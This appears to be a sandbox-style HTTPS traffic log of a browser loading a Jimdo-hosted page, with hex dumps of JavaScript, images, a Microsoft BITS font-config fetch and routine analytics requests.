2024-04-18 17:39:05 UTC	1379	IN	Data Raw: 65 74 65 20 74 68 69 73 2e 5f 63 61 63 68 65 5b 65 5d 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 63 61 63 68 65 3d 7b 7d 7d 7d 2c 32 34 33 36 36 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 69 3d 6e 28 36 38 30 30 29 2e 4d 69 73 73 69 6e 67 52 65 66 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 6e 2c 6f 29 7b 76 61 72 20 61 3d 74 68 69 73 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 74 68 69 73 2e 5f 6f 70 74 73 2e 6c 6f 61 64 53 63 68 65 6d 61 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6f 70 74 69 6f 6e 73 2e 6c 6f 61 64 53 63 68 65 6d 61 20 73 68 6f 75 6c 64 20 62 65 20 61 20 66 75 6e 63 Data Ascii: ete this._cache[e]},t.prototype.clear=function(){this._cache={}}},24366:(e,t,n)=>{"use strict";var i=n(6800).MissingRef;e.exports=function e(t,n,o){var a=this;if("function"!=typeof this._opts.loadSchema)throw new Error("options.loadSchema should be a func
2024-04-18 17:39:05 UTC	1379	IN	Data Raw: 69 64 61 74 69 6f 6e 20 66 61 69 6c 65 64 22 2c 74 68 69 73 2e 65 72 72 6f 72 73 3d 65 2c 74 68 69 73 2e 61 6a 76 3d 74 68 69 73 2e 76 61 6c 69 64 61 74 69 6f 6e 3d 21 30 7d 29 29 2c 4d 69 73 73 69 6e 67 52 65 66 3a 61 28 6f 29 7d 2c 6f 2e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 63 61 6e 27 74 20 72 65 73 6f 6c 76 65 20 72 65 66 65 72 65 6e 63 65 20 22 2b 74 2b 22 20 66 72 6f 6d 20 69 64 20 22 2b 65 7d 7d 2c 39 38 33 38 37 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 69 3d 6e 28 32 33 33 38 34 29 2c 6f 3d 2f 5e 28 5c 64 5c 64 5c 64 5c 64 29 2d 28 5c 64 5c 64 29 2d 28 5c 64 5c 64 29 24 2f 2c 61 3d 5b 30 2c 33 31 2c 32 38 2c 33 31 2c 33 30 2c 33 31 2c 33 30 2c 33 31 2c 33 Data Ascii: idation failed",this.errors=e,this.ajv=this.validation=!0})),MissingRef:a(o)},o.message=function(e,t){return"can't resolve reference "+t+" from id "+e}},98387:(e,t,n)=>{"use strict";var i=n(23384),o=/^(\d\d\d\d)-(\d\d)-(\d\d)$/,a=[0,31,28,31,30,31,30,31,3
2024-04-18 17:39:05 UTC	1379	IN	Data Raw: 29 2a 2b 2c 3b 3d 3a 40 5d 7c 25 5b 30 2d 39 61 2d 66 5d 7b 32 7d 29 2b 28 3f 3a 5c 2f 28 3f 3a 5b 61 2d 7a 30 2d 39 5c 2d 2e 5f 7e 21 24 26 27 28 29 2a 2b 2c 3b 3d 3a 40 5d 7c 25 5b 30 2d 39 61 2d 66 5d 7b 32 7d 29 2a 29 2a 29 28 3f 3a 5c 3f 28 3f 3a 5b 61 2d 7a 30 2d 39 5c 2d 2e 5f 7e 21 24 26 27 28 29 2a 2b 2c 3b 3d 3a 40 2f 3f 5d 7c 25 5b 30 2d 39 61 2d 66 5d 7b 32 7d 29 2a 29 3f 28 3f 3a 23 28 3f 3a 5b 61 2d 7a 30 2d 39 5c 2d 2e 5f 7e 21 24 26 27 28 29 2a 2b 2c 3b 3d 3a 40 2f 3f 5d 7c 25 5b 30 2d 39 61 2d 66 5d 7b 32 7d 29 2a 29 3f 24 2f 69 2c 63 3d 2f 5e 28 3f 3a 28 3f 3a 5b 5e 5c 78 30 30 2d 5c 78 32 30 22 27 3c 3e 25 5c 5c 5e 60 7b 7c 7d 5d 7c 25 5b 30 2d 39 61 2d 66 5d 7b 32 7d 29 7c 5c 7b 5b 2b 23 2e 2f 3b 3f 26 3d 2c 21 40 7c 5d 3f 28 3f 3a 5b Data Ascii: )+,;=:@]\|%[0-9a-f]{2})+(?:\/(?:[a-z0-9\-._~!$&'()+,;=:@]\|%[0-9a-f]{2})))(?:\?(?:[a-z0-9\-._~!$&'()+,;=:@/?]\|%[0-9a-f]{2}))?(?:#(?:[a-z0-9\-._~!$&'()+,;=:@/?]\|%[0-9a-f]{2}))?$/i,c=/^(?:(?:[^\x00-\x20"'<>%\\^`{\|}]\|%[0-9a-f]{2})\|\{[+#./;?&=,!@\|]?(?:[

Timestamp	Bytes transferred	Direction	Data
2024-04-18 17:39:06 UTC	713	OUT	GET /image/454238981/23f5ed5a-6c3b-4b7b-a128-0fd6b1efd2a9.png?quality=80,90&auto=webp&disable=upscale&width=320&height=320 HTTP/1.1 Host: jimdo-storage.freetls.fastly.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://doc-36.jimdosite.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 17:39:07 UTC	791	IN	HTTP/1.1 200 OK Connection: close Content-Length: 10576 Cache-Control: max-age=31536000,public Content-Language: en-gb Content-Type: image/webp Etag: "XX9bJn8zgW8jAMRuwzvA4+OxTBGL32MMrdk82Kav3Io" Fastly-Io-Info: ifsz=11740 idim=400x400 ifmt=png ofsz=10576 odim=320x320 ofmt=webp Fastly-Io-Served-By: img06-europe-west3 Fastly-Stats: io=1 Referrer-Policy: same-origin Strict-Transport-Security: max-age=15724800; includeSubDomains X-Content-Type-Options: nosniff X-Frame-Options: DENY Via: 1.1 varnish, 1.1 varnish Access-Control-Allow-Origin: * Accept-Ranges: bytes Age: 6650 Date: Thu, 18 Apr 2024 17:39:07 GMT X-Served-By: cache-fra-etou8220059-FRA, cache-pdk-kfty2130027-PDK X-Cache: HIT, HIT X-Cache-Hits: 11, 0 X-Timer: S1713461947.041373,VS0,VE1 Vary: Accept
2024-04-18 17:39:07 UTC	1379	IN	Data Raw: 52 49 46 46 48 29 00 00 57 45 42 50 56 50 38 4c 3c 29 00 00 2f 3f c1 4f 00 55 87 e2 b6 6d 1c 69 ff bd 93 5c 2f af 88 98 00 5e ba 60 97 38 6f 1a 66 d2 55 b4 34 4c 4b 7b 31 ce 04 8c 33 1d fb 20 6d 82 40 97 7c 80 58 e6 ff 57 b6 49 ce 32 33 33 33 33 33 33 33 33 33 85 99 99 96 99 99 99 99 99 99 99 99 79 f7 be 9f 73 5d f7 7d 5f 4b ea 99 90 6a 37 6f 80 55 38 8a dd a8 71 27 e0 18 af b0 7a a2 58 71 a2 98 ba 46 f5 aa f6 e1 28 ec 1a df 6e 55 58 8d da c1 f6 5b f4 1b 15 66 95 3a 55 f3 06 82 f7 f8 ae f1 ad 82 8e db ad 8b 1a 3f 51 71 cc aa db b7 ea 79 03 77 68 51 85 fe 35 3e 1c 95 bf 0a aa a5 3b 2c 59 71 e2 99 99 13 85 3d 13 52 29 6c 1f 8e e2 e4 0d dc a6 df 40 e0 44 ed 8b f8 89 76 a1 ae 85 27 ac 66 d4 fa 8e 62 e6 a8 8d 6f 15 8e 62 8e ca a8 a0 e2 c4 5d 22 1c 99 aa 23 c3 Data Ascii: RIFFH)WEBPVP8L<)/?OUmi\/^`8ofU4LK{13 m@\|XWI2333333333ys]}_Kj7oU8q'zXqF(nUX[f:U?QqywhQ5>;,Yq=R)l@Dv'fbob]"#
2024-04-18 17:39:07 UTC	1379	IN	Data Raw: 78 ae 29 22 f7 b3 9f fd fc b2 91 06 45 8b 03 00 0e 29 00 07 7d 29 d9 ab 64 69 df 22 2f fa c0 70 c8 0f 40 51 07 c0 20 02 7a c8 cd d9 fb c9 cc bf a5 a7 b4 bb 5d be d3 6a 37 a0 e4 48 7d 2c a6 b1 b1 0b ab eb 75 05 46 3f 0a d6 1a 88 aa 10 c5 a7 e9 e2 03 6e 2b 9f 6c f9 f4 17 77 20 21 43 02 1c 1e 6e 91 65 b0 4c 0a bc 6c 96 c0 da e0 61 39 ea 8f 1c 00 23 6e c4 33 97 91 5f fb ca 7b bc 9c 60 49 6d d2 05 5c 97 95 6e 20 50 52 f0 c1 dd bc 70 5e 9d bd 3e df 18 82 5f 61 48 41 06 2b 4c cf 36 0d 3f e1 93 0e 4d e6 68 ef 0b 26 fe 0e 07 2f 8e d1 51 f8 45 c3 43 71 54 1e 11 80 3d 88 d9 7a 02 e2 81 27 bf bf 9d b2 d8 de cf 15 72 58 d7 c3 42 d8 77 11 fb b2 37 15 9c e1 fc ac d7 3f 00 e3 01 93 32 90 90 4e 73 7d 2a ac 2f 12 e8 ee 19 db 30 72 38 09 b1 52 c6 40 a1 c7 8a 5f 12 47 e5 19 Data Ascii: x)"E)})di"/p@Q z]j7H},uF?n+lw !CneLla9#n3_{`Im\n PRp^>_aHA+L6?Mh&/QECqT=z'rXBw7?2Ns}*/0r8R@_G
2024-04-18 17:39:07 UTC	1379	IN	Data Raw: ee 9e d9 81 5f dc 06 0f b9 6b 36 c6 71 b0 52 a8 2c f1 a6 dc 4b 95 67 d4 09 e7 5a 09 ab 85 2b a6 b8 b7 5f e4 b0 a0 0a c7 00 18 79 23 1e 79 f9 33 9b 7e 37 ce 95 fe 70 e8 e4 16 49 49 6d 92 2b fd 5d 70 d2 c7 98 4f 7b ff 32 c0 00 20 67 e4 e9 ac 4c a1 f8 60 2f f6 32 5a 83 0c 36 e9 9a ec 43 a0 8b 37 f4 2f ac 88 ab d3 82 31 63 bc ea 94 31 aa d3 d2 a2 f2 80 5c 34 93 04 13 62 7c 60 de 74 a1 63 69 1f 3e c4 61 72 70 87 75 99 f5 ba ab 30 18 61 b5 e8 60 de 52 8a fb 72 91 d2 1c 30 db 32 f0 4f 3d 5a de d7 7e d4 2c e9 fc 93 2d 9b 58 6b c3 4d 46 d0 a1 4e d8 ac 87 c5 fc da de c0 82 0a 02 60 b0 fc cc 6a cb 3e 46 92 e7 da f7 28 85 0c 96 56 d8 35 c9 27 5e 62 41 56 27 73 ce a3 03 0c f0 4f 7a fc 27 17 4e 93 53 34 8c dc 30 1f 96 ca 25 f2 d4 0f 43 d2 96 82 66 8e 24 b3 fb dc 36 6b Data Ascii: _k6qR,KgZ+_y#y3~7pIIm+]pO{2 gL`/2Z6C7/1c1\4b\|`tci>arpu0a`Rr02O=Z~,-XkMFN`j>F(V5'^bAV'sOz'NS40%Cf$6k
2024-04-18 17:39:07 UTC	1379	IN	Data Raw: 51 77 ec e5 b0 21 3a 28 5a 17 da f0 52 5f 56 b3 57 5b f2 f8 cf 34 ad b5 9d e3 e0 7c ea c5 55 bc a5 17 d4 15 cf a7 fd 9d 70 b0 44 fb 22 81 35 44 26 ca f2 69 0b b6 d6 d5 1b 0e 28 aa 86 9f db 11 f7 db ff 4f 37 86 7a 35 f7 5a a4 73 39 06 cb 18 f2 d5 7d 42 07 3a 96 7e 85 e9 be 8b 97 08 1e 8f bd 7b e8 e2 69 4d 65 44 c7 d5 23 30 14 91 38 20 38 51 8e ba 9b e9 08 1f 01 17 8b 5a 5e 14 08 46 48 77 00 35 29 08 6b 8c 8c ec 97 65 b5 ce 99 dc 01 ee 0b f9 38 bd 33 aa d0 c2 4a 91 ec 6f 7a d0 15 a7 56 8f d6 b1 07 31 85 72 77 12 b6 5e ff ec e1 91 99 e2 ad 69 68 82 37 e8 4b c9 61 1e 02 0b 6e ec af 1d 66 a5 7e ab ee 9e f9 f2 88 12 66 36 bd 05 c2 31 20 62 99 ac 5a 54 e9 95 60 9a ee b3 20 57 8c 10 70 1e b0 16 cf 34 b8 99 3d 71 5c d3 51 df 9a e4 7d fa 1c f1 39 f9 7d 24 2f 8b 84 Data Ascii: Qw!:(ZR_VW[4\|UpD"5D&i(O7z5Zs9}B:~{iMeD#08 8QZ^FHw5)ke83JozV1rw^ih7Kanf~f61 bZT` Wp4=q\Q}9}$/
2024-04-18 17:39:07 UTC	1379	IN	Data Raw: 71 be d0 15 4d ae 3a e6 ee 92 11 7e 71 29 cc 83 bf 1d 79 f2 f8 68 27 ca e7 b8 7b 7e 0a de 24 a2 a0 c5 71 a9 89 60 b0 c4 d2 2a b7 ac 0e 74 fd 8a ad 1b 39 0c 8d 71 af a3 47 58 a9 0b a7 bf b8 a3 18 1a 63 7a 4b 73 b1 7f 4f 58 29 db d7 f6 c3 82 aa 83 6f 10 12 56 b7 ca 7c 78 a4 d0 90 fc 32 9b d1 97 33 36 2b 75 d2 9f 6a 66 f6 82 ed ea d9 a7 cc d6 cc 1f 9e df a9 43 2b 8f 03 6e 75 e7 d0 d5 f1 e8 51 de a3 a8 34 23 d9 c7 26 b8 a3 d6 13 a7 8a 58 45 c2 ef b3 96 43 c7 3f 80 98 79 31 f0 58 3c 4c c6 62 6c d6 31 0e c8 5e 8b 92 d6 14 11 30 06 8b ae ea 5c cb 4a f9 88 13 3f db 11 e1 a4 cc ad f7 95 87 59 a9 db cc 74 66 9a 03 7f ad ab 37 7e 7e 2f b6 fc 8a 61 1c 2c 2f ab 2a 34 ab dd 6e 9f b1 23 4d 87 a1 c1 51 f2 84 e5 f5 41 32 f3 3b c5 d2 58 7b 6f db 97 d7 f4 57 30 09 68 d8 23 Data Ascii: qM:~q)yh'{~$q`t9qGXczKsOX)oV\|x236+ujfC+nuQ4#&XEC?y1X<Lbl1^0\J?Ytf7~~/a,/4n#MQA2;X{oW0h#
2024-04-18 17:39:07 UTC	1379	IN	Data Raw: ec d1 26 85 5f 56 a1 4b c7 f3 b0 cf 8d c6 50 49 54 2d 5d c1 d4 bd 75 6b f1 66 1e 68 77 ac fd 40 52 57 43 01 d4 e9 a3 a3 8c 38 03 3a b5 a7 2b 31 a2 91 4f f1 51 23 ac d4 c1 57 f9 f2 64 68 10 01 39 4c a7 ac cf 7a 19 a1 d2 df bd 1f 46 03 61 f7 e2 36 d9 23 64 45 bc 89 0d 07 82 35 a8 f7 bb 36 e8 1d 43 20 15 19 84 9e 2c 63 92 a7 48 b2 ac 94 70 da 69 be 3a 1c 0c 86 d2 69 ae 6f 8b 88 cb 9e fa e4 be 63 2f 16 8e 7f fa 02 f8 f8 71 93 dc 78 da 15 ae c6 e6 41 c4 48 20 17 c2 fe 20 2b 99 d5 e6 05 70 dc 0b 43 89 c4 82 b2 1f 48 6d 89 15 53 af e6 51 9d c6 22 56 4b c9 d2 0b 1a c6 41 af e6 de 10 20 8b 4a 6e 40 b6 64 e3 c8 07 52 b0 d6 d0 78 fc ec 73 8f 58 6b 23 79 91 40 6e 5a 97 ef 98 fa c6 1c d1 57 07 86 e6 55 44 d7 14 99 23 84 2c ab 23 6d be d4 97 47 23 84 e0 e6 bf 56 35 fa Data Ascii: &_VKPIT-]ukfhw@RWC8:+1OQ#Wdh9LzFa6#dE56C ,cHpi:ioc/qxAH +pCHmSQ"VKA Jn@dRxsXk#y@nZWUD#,#mG#V5
2024-04-18 17:39:07 UTC	1379	IN	Data Raw: f4 88 00 8f c9 b1 46 1e 94 24 ed 5a e9 47 24 26 fd 68 78 18 7a 2c 01 6e 89 97 86 18 79 99 32 a7 a3 2b 0d c2 a0 68 9d d9 cc 2b 2c f2 c6 5d 7c e0 eb c2 81 c1 4f 4e 0e c7 49 2d c2 71 15 29 68 b2 ac bc dc 2b a2 c0 b7 99 c2 fe b6 b0 ac d6 99 99 6b 0d 4d 18 82 cf ca 3d f3 b9 22 66 80 78 00 2f 7d 96 3b ff b2 16 65 e4 96 fd a7 6b 51 64 7f 80 d4 0c 02 b4 bb d2 ff b8 04 ce 87 bf 05 04 91 2e 9e 1c 72 d6 88 98 04 bc 3b 1f e6 72 11 8c e0 31 24 b5 34 8a b1 4b 19 bd c2 80 f8 d0 a4 27 2b 87 83 62 f4 a3 a0 5d be f1 06 24 7e e2 ac 75 56 e9 71 6f dd d8 80 57 81 f9 8e df 2d d5 b2 da 56 a7 b2 eb 57 9c 0f 1c 42 9c 57 0c 7c 14 20 94 03 f2 86 6a 1a 04 68 31 70 11 d0 f2 76 50 8d 00 1f 90 d7 0b a2 7a 5c 08 ac d1 e9 a6 11 98 8a 84 df 22 57 48 14 f1 4f e4 58 9a 06 db d5 b5 af 6d d9 Data Ascii: F$ZG$&hxz,ny2+h+,]\|ONI-q)h+kM="fx/};ekQd.r;r1$4K'+b]$~uVqoW-VWBW\| jh1pvPz\"WHOXm
2024-04-18 17:39:07 UTC	923	IN	Data Raw: 3e 5d d1 15 e3 19 ea e2 79 03 37 e0 db cb da aa 8c 7b 93 35 44 a5 03 90 21 82 27 51 b1 31 86 8c 31 04 cf 5d 4b e9 2a 12 6b 8e 83 73 24 ed fe 5e a0 1e 96 c2 5e 45 dc dc 7b fd ba 00 21 b1 3a 25 f7 c7 27 5e c1 5b 2e 9b 63 5f fd 5c e8 d6 ad db 29 16 cd 00 17 48 cf 6b fb 8a de 48 d2 2a 49 e5 9e 69 75 22 f3 2e 9b e0 ac d4 48 a4 25 77 c5 f7 2c 83 ab 3f cb c4 e9 da b5 eb 68 8b 63 a5 7c 05 69 99 7b 7f ad 4e 64 fe ff ad 4e 14 f5 3e 59 e7 d9 b6 44 ab 2e 27 8a d8 6a 18 6a d1 11 06 14 96 ef 54 9d ca 22 df d8 b5 6d 1f 66 7a 4b b3 69 a7 70 00 c0 19 0e 26 f9 8e b2 cc 21 78 3a bb 97 b0 97 9c d3 c0 bb 98 92 b4 40 43 80 c2 de 2d a7 ca b2 73 ea f4 90 4f 48 bc 9a d5 98 db c7 67 9e 2d 37 63 5e ad 64 8e c5 6d 33 92 2f b1 17 f6 48 fb f6 ed 4f e9 c8 cc 32 57 79 14 96 08 4b 2c 7d Data Ascii: >]y7{5D!'Q11]Kks$^^E{!:%'^[.c_\)HkHIiu".H%w,?hc\|i{NdN>YD.'jjT"mfzKip&!x:@C-sOHg-7c^dm3/HO2WyK,}

Timestamp	Bytes transferred	Direction	Data
2024-04-18 17:39:07 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-18 17:39:07 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/0758) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus-z1 Cache-Control: public, max-age=221110 Date: Thu, 18 Apr 2024 17:39:07 GMT Connection: close X-CID: 2

Timestamp	Bytes transferred	Direction	Data
2024-04-18 17:39:07 UTC	680	OUT	GET /renderer/static/default-website-favicon.1a874ea70dbf3a4b0e0e..png HTTP/1.1 Host: jimdo-dolphin-static-assets-prod.freetls.fastly.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://doc-36.jimdosite.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 17:39:08 UTC	711	IN	HTTP/1.1 200 OK Connection: close Content-Length: 549 x-amz-id-2: GzTe4NmCYyQ6sXimhF2FD88MDux5SdWy7+DxZwXcnlXf7notl770oQS7Vme16S3mOfTXYaN2eF8= x-amz-request-id: 5Q17JWZGNWFH74T5 Last-Modified: Fri, 05 Apr 2024 09:30:16 GMT ETag: "fd400ada20e53b4bb4efbbeb0c0e16fd" x-amz-server-side-encryption: AES256 x-amz-version-id: mrqj1xjAhVnJ8Io7ClQykqBChWv7J6eH Content-Type: image/png Via: 1.1 varnish, 1.1 varnish Access-Control-Allow-Origin: * Cache-Control: public, max-age=31536000 Accept-Ranges: bytes Date: Thu, 18 Apr 2024 17:39:08 GMT Age: 899903 X-Served-By: cache-fra-etou8220157-FRA, cache-pdk-kfty2130025-PDK X-Cache: HIT, HIT X-Cache-Hits: 16081, 2 X-Timer: S1713461948.098375,VS0,VE0
2024-04-18 17:39:08 UTC	549	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 03 00 00 00 44 a4 8a c6 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 c6 50 4c 54 45 00 00 00 01 01 01 01 01 12 01 03 27 01 03 31 01 03 34 01 02 12 00 01 01 01 01 02 01 03 26 01 01 03 01 02 13 1a 1c 48 1b 1d 48 04 06 37 e8 e8 e9 ef ef ef 1f 21 4b 21 23 4d b9 ba c5 ad ae bb 03 05 35 eb eb ec 1d 1f 4a 16 18 44 26 28 51 35 36 5d ed ed ed 09 0b 3b d2 d2 d8 af b0 bd 07 09 38 0a 0c 3b ba bb c5 c4 c4 cd 81 82 99 c0 c0 ca 57 58 77 36 38 5e 5b 5c 7b c7 c7 cf 73 74 8e 19 1b 47 e3 e4 e6 dd dd e1 11 13 40 5c 5e 7c ee ee ee 4f 50 71 74 75 8e ee ee ef ed ed ee 67 68 84 4a 4b 6d d4 d4 d9 ce cf d5 41 43 66 01 03 32 08 09 39 55 56 76 9c 9d ae c5 c5 ce c3 c4 cd 99 99 ab 4f 51 72 06 08 38 1b 78 88 Data Ascii: PNGIHDR DsRGBPLTE'14&HH7!K!#M5JD&(Q56];8;WXw68^[\{stG@\^\|OPqtughJKmACf29UVvOQr8x

Timestamp	Bytes transferred	Direction	Data
2024-04-18 17:39:08 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-18 17:39:08 UTC	531	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0rcGnYgAAAAANOnx9vccHTr21ROgX9ESTU0pDRURHRTAzMDkAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm Cache-Control: public, max-age=221090 Date: Thu, 18 Apr 2024 17:39:08 GMT Content-Length: 55 Connection: close X-CID: 2
2024-04-18 17:39:08 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Timestamp	Bytes transferred	Direction	Data
2024-04-18 17:39:08 UTC	628	OUT	POST /anon HTTP/1.1 Host: at.prod.jimdo.systems Connection: keep-alive Content-Length: 307 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://doc-36.jimdosite.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://doc-36.jimdosite.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 17:39:08 UTC	307	OUT	Data Raw: 7b 22 6d 65 74 61 22 3a 22 7b 5c 22 6c 61 6e 67 75 61 67 65 5c 22 3a 5c 22 65 6e 5c 22 2c 5c 22 6c 6f 63 61 74 69 6f 6e 5c 22 3a 5c 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 33 36 2e 6a 69 6d 64 6f 73 69 74 65 2e 63 6f 6d 2f 5c 22 2c 5c 22 74 69 6d 65 53 70 65 6e 74 4f 6e 50 61 67 65 49 6e 4d 53 5c 22 3a 30 2c 5c 22 73 63 72 6f 6c 6c 44 65 70 74 68 5c 22 3a 30 2c 5c 22 72 65 66 65 72 72 65 72 5c 22 3a 5c 22 5c 22 2c 5c 22 6d 61 78 53 63 72 6f 6c 6c 44 65 70 74 68 5c 22 3a 30 2c 5c 22 71 75 65 72 79 5c 22 3a 7b 7d 2c 5c 22 61 75 74 6f 5c 22 3a 74 72 75 65 7d 22 2c 22 74 6f 70 69 63 22 3a 22 77 65 62 73 69 74 65 2e 70 61 67 65 2e 6c 6f 61 64 69 6e 67 22 2c 22 73 65 71 22 3a 30 2c 22 73 69 64 22 3a 22 31 37 31 33 34 36 31 39 34 36 35 35 34 2d 71 67 70 38 6b 22 Data Ascii: {"meta":"{\"language\":\"en\",\"location\":\"https://doc-36.jimdosite.com/\",\"timeSpentOnPageInMS\":0,\"scrollDepth\":0,\"referrer\":\"\",\"maxScrollDepth\":0,\"query\":{},\"auto\":true}","topic":"website.page.loading","seq":0,"sid":"1713461946554-qgp8k"
2024-04-18 17:39:09 UTC	206	IN	HTTP/1.1 204 No Content Date: Thu, 18 Apr 2024 17:39:08 GMT Connection: close access-control-allow-origin: https://doc-36.jimdosite.com Strict-Transport-Security: max-age=15724800; includeSubDomains

Timestamp	Bytes transferred	Direction	Data
2024-04-18 17:39:08 UTC	626	OUT	POST /cf HTTP/1.1 Host: at.prod.jimdo.systems Connection: keep-alive Content-Length: 307 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://doc-36.jimdosite.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://doc-36.jimdosite.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 17:39:08 UTC	307	OUT	Data Raw: 7b 22 6d 65 74 61 22 3a 22 7b 5c 22 6c 61 6e 67 75 61 67 65 5c 22 3a 5c 22 65 6e 5c 22 2c 5c 22 6c 6f 63 61 74 69 6f 6e 5c 22 3a 5c 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 33 36 2e 6a 69 6d 64 6f 73 69 74 65 2e 63 6f 6d 2f 5c 22 2c 5c 22 74 69 6d 65 53 70 65 6e 74 4f 6e 50 61 67 65 49 6e 4d 53 5c 22 3a 30 2c 5c 22 73 63 72 6f 6c 6c 44 65 70 74 68 5c 22 3a 30 2c 5c 22 72 65 66 65 72 72 65 72 5c 22 3a 5c 22 5c 22 2c 5c 22 6d 61 78 53 63 72 6f 6c 6c 44 65 70 74 68 5c 22 3a 30 2c 5c 22 71 75 65 72 79 5c 22 3a 7b 7d 2c 5c 22 61 75 74 6f 5c 22 3a 74 72 75 65 7d 22 2c 22 74 6f 70 69 63 22 3a 22 77 65 62 73 69 74 65 2e 70 61 67 65 2e 6c 6f 61 64 69 6e 67 22 2c 22 73 65 71 22 3a 30 2c 22 73 69 64 22 3a 22 31 37 31 33 34 36 31 39 34 36 35 35 34 2d 74 68 6c 36 6c 22 Data Ascii: {"meta":"{\"language\":\"en\",\"location\":\"https://doc-36.jimdosite.com/\",\"timeSpentOnPageInMS\":0,\"scrollDepth\":0,\"referrer\":\"\",\"maxScrollDepth\":0,\"query\":{},\"auto\":true}","topic":"website.page.loading","seq":0,"sid":"1713461946554-thl6l"
2024-04-18 17:39:09 UTC	206	IN	HTTP/1.1 204 No Content Date: Thu, 18 Apr 2024 17:39:08 GMT Connection: close access-control-allow-origin: https://doc-36.jimdosite.com Strict-Transport-Security: max-age=15724800; includeSubDomains

Timestamp	Bytes transferred	Direction	Data
